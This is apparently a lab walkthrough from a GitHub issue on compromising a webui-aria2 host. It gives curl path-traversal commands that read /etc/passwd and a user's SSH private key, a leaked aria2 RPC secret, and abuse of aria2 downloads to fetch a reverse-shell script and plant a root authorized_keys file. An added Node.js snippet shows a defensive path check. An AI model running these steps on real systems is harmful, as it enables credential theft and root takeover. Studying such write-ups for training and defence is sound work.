Open WDavid404 opened 2 months ago
PORT     STATE SERVICE         REASON         VERSION
22/tcp   open  ssh             syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
8888/tcp open  sun-answerbook? syn-ack ttl 61
gobuster --> no info
Search webui aria2 exploit --> Path Traversal (https://security.snyk.io/vuln/SNYK-JS-WEBUIARIA2-6322148)
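Note: Visiting http://192.168.247.100:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd
in a web browser doesn't work: it returns a 404 error, because the browser collapses the ../ segments before sending the request. curl's --path-as-is option sends the path unchanged.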
curl --path-as-is http://192.168.247.100:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd
--> deathflash user
curl --path-as-is http://192.168.247.100:8888/../../../../../../../../../../../../../../../../../../../../home/deathflash/.ssh/id_rsa
-->
Got private key info. Save it as id_rsa
ssh -i id_rsa_pg deathflash@192.168.247.100
--> login succeeds.
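The traversal above only works when the server maps the raw request path onto the filesystem without confining it to its document root. As an added example (not webui-aria2's code; WEB_ROOT, naiveResolve and safeResolve are hypothetical names), this shows a naive path join beside a confined one that a static file server could use to reject such requests:

```javascript
// Added example, not the project's code. WEB_ROOT is a hypothetical docs directory.
const path = require('path');

const WEB_ROOT = '/srv/webui/docs';

// Naive mapping: join the raw request path onto the root.
// path.join normalizes "..", so enough of them walk out of WEB_ROOT.
function naiveResolve(urlPath) {
  return path.join(WEB_ROOT, urlPath);
}

// Confined mapping: decode once, resolve against the root, then require
// the result to stay inside WEB_ROOT. Returns null when the request
// must be rejected (the caller would answer 400/404).
function safeResolve(urlPath) {
  let decoded;
  try {
    decoded = decodeURIComponent(urlPath.split('?')[0]);
  } catch (e) {
    return null; // malformed percent-encoding
  }
  if (decoded.includes('\0')) return null; // NUL byte in path

  const resolved = path.resolve(WEB_ROOT, '.' + path.sep + decoded);
  const rel = path.relative(WEB_ROOT, resolved);
  // Outside the root if the relative path climbs upward or is absolute.
  if (rel === '..' || rel.startsWith('..' + path.sep) || path.isAbsolute(rel)) {
    return null;
  }
  return resolved;
}

// Constructed sample requests: one legitimate, one as sent by curl --path-as-is,
// and one using percent-encoded dot segments.
const samples = ['/index.html', '/../../../../etc/passwd', '/%2e%2e/%2e%2e/%2e%2e/etc/passwd'];
for (const s of samples) {
  console.log(s, '| naive:', naiveResolve(s), '| confined:', safeResolve(s));
}
```

The same check belongs in any reverse proxy or handler in front of the service, since clients that send the path as-is bypass browser-side normalization.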
[PE]
linpeas
-->
0.0.0.0:6800
find / -iname aria2* -type f 2>/dev/null
cat /etc/systemd/system/aria2.service
--> rpc-secret=mEHNghqcNiF3KV
Set up a ligolo-ng tunnel, then visit 240.0.0.1:8888, enter the secret and add our IP as the download URL.
--> We can see that rev.sh is downloaded to the target host's /tmp.
--> rev.sh is owned by root and we cannot run it (permission denied).
Instead, we can upload an SSH public key (file name: authorized_keys) to /root/.ssh in the same way and then log in over SSH as the root user.
Key points:
find / -iname aria2* -type f 2>/dev/null
--> find a config file that contains secret info